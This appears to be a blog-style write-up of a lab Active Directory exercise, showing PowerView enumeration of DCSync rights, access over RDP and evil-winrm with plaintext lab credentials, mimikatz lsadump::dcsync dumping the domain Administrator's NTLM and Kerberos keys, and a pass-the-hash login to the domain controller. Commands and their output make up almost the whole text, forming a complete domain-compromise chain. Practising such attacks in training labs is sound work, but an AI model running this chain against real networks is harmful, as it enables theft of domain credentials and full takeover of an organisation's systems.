PS C:\Users\tpetty> Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 89e95b76-444d-4c62-991a-0facbeda640c
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
ObjectDN : DC=INLANEFREIGHT,DC=LOCAL
ObjectSID : S-1-5-21-2270287766-1317258649-2146029398
ActiveDirectoryRights : ExtendedRight
ObjectAceFlags : ObjectAceTypePresent
ObjectAceType : 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength : 56
AceQualifier : AccessAllowed
IsCallback : False
OpaqueLength : 0
AccessMask : 256
SecurityIdentifier : S-1-5-21-2270287766-1317258649-2146029398-4607
AceType : AccessAllowedObject
AceFlags : None
IsInherited : False
InheritanceFlags : None
PropagationFlags : None
AuditFlags : None
We notice the GUIDs below after checking them online which can lead to DCSync attack:
1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
89e95b76-444d-4c62-991a-0facbeda640c
Replicating Directory Changes + Replicating Directory Changes All (with ExtendedRight on the domain object)
I connect to the host via RDP:
┌─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains xfreerdp /v:172.16.6.50 /u:svc_sql /p:lucky7 /size:600x550[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:3389 ... OK
Then I ran runas /user:INLANEFREIGHT\tpetty powershell.exe to run as tpetty, this open another powershell running as tpetty
To futher enumerate I need mimikatz on the host, so I decided to connect the host via evil-winrm to make it easy to upload scripts. I uploaded mimikatz via evil-winrm in the tpetty DIR for easy access
proxychains evil-winrm -i 172.16.6.50 -u svc_sql -p lucky7
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.50:5985 ... OK
*Evil-WinRM* PS C:\Users\svc_sql.INLANEFREIGHT\Documents> cd C:\
*Evil-WinRM* PS C:\> cd Users
*Evil-WinRM* PS C:\Users> cd tpetty
Then I run mimikatz on the powershell running as tpetty
PS C:\Users\tpetty> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #18362 Feb 29 2020 11:13:36
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz #
Once mimikatz is running, you should see mimikatz # then run privilege::debug
mimikatz # privilege::debug
ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061
The run lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator to get domain Admin hash
mimikatz # lsadump::dcsync /domain:INLANEFREIGHT.LOCAL /user:INLANEFREIGHT\administrator
[DC] 'INLANEFREIGHT.LOCAL' will be the domain
[DC] 'DC01.INLANEFREIGHT.LOCAL' will be the DC server
[DC] 'INLANEFREIGHT\administrator' will be the user account
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration :
Password last change : 4/11/2022 9:24:49 PM
Object Security ID : S-1-5-21-2270287766-1317258649-2146029398-500
Object Relative ID : 500
Credentials:
Hash NTLM: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 0: 27dedb1dab4d8545c6e1c66fba077da0
ntlm- 1: bdaffbfe64f1fc646a3353be1c2c3c99
lm - 0: 757743529af55e110994f3c7e3710fc9
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : b8bcb44123b3cc3bff20c663f1e0b94d
* Primary:Kerberos-Newer-Keys *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : a76102a5617bffb1ea84ba0052767992823fd414697e81151f7de21bb41b1857
aes128_hmac (4096) : 69e27df2550c5c270eca1d8ce5c46230
des_cbc_md5 (4096) : c2d9c892f2e6f2dc
OldCredentials
aes256_hmac (4096) : 51d2b5ce03d6ea2e75e69050f32b927d0e602c2806dcb0d1dd0aacdda619a510
aes128_hmac (4096) : b93da9262f5ce0ed724ce0177366bc8a
des_cbc_md5 (4096) : 0876d604a7087cf7
OlderCredentials
aes256_hmac (4096) : 23cbc0dad348bebcbdbb4c82e9b23af299e8b56de358bafe24f2235f34497e4a
aes128_hmac (4096) : e35eb565af30c8ed79df5d8875508df6
des_cbc_md5 (4096) : 4904021983252cd5
* Primary:Kerberos *
Default Salt : INLANEFREIGHT.LOCALAdministrator
Credentials
des_cbc_md5 : c2d9c892f2e6f2dc
OldCredentials
des_cbc_md5 : 0876d604a7087cf7
Now we have Domain Admin hash, I tried cracking the hash but no luck so I decided to pass the hash using evil-winrm to log in to DC:
─[eu-academy-1]─[10.10.14.30]─[htb-ac-2510340@htb-hnkzcchgmi]─[~]
└──╼ [★]$ proxychains evil-winrm -i 172.16.6.3 -u Administrator -H 27dedb1dab4d8545c6e1c66fba077da0
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
PS C:\Users\Administrator\Desktop> whoami
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.16.6.3:5985 ... OK
inlanefreight\administrator
Game Over.... Domain admin compromised!!!!!!
Top comments (0)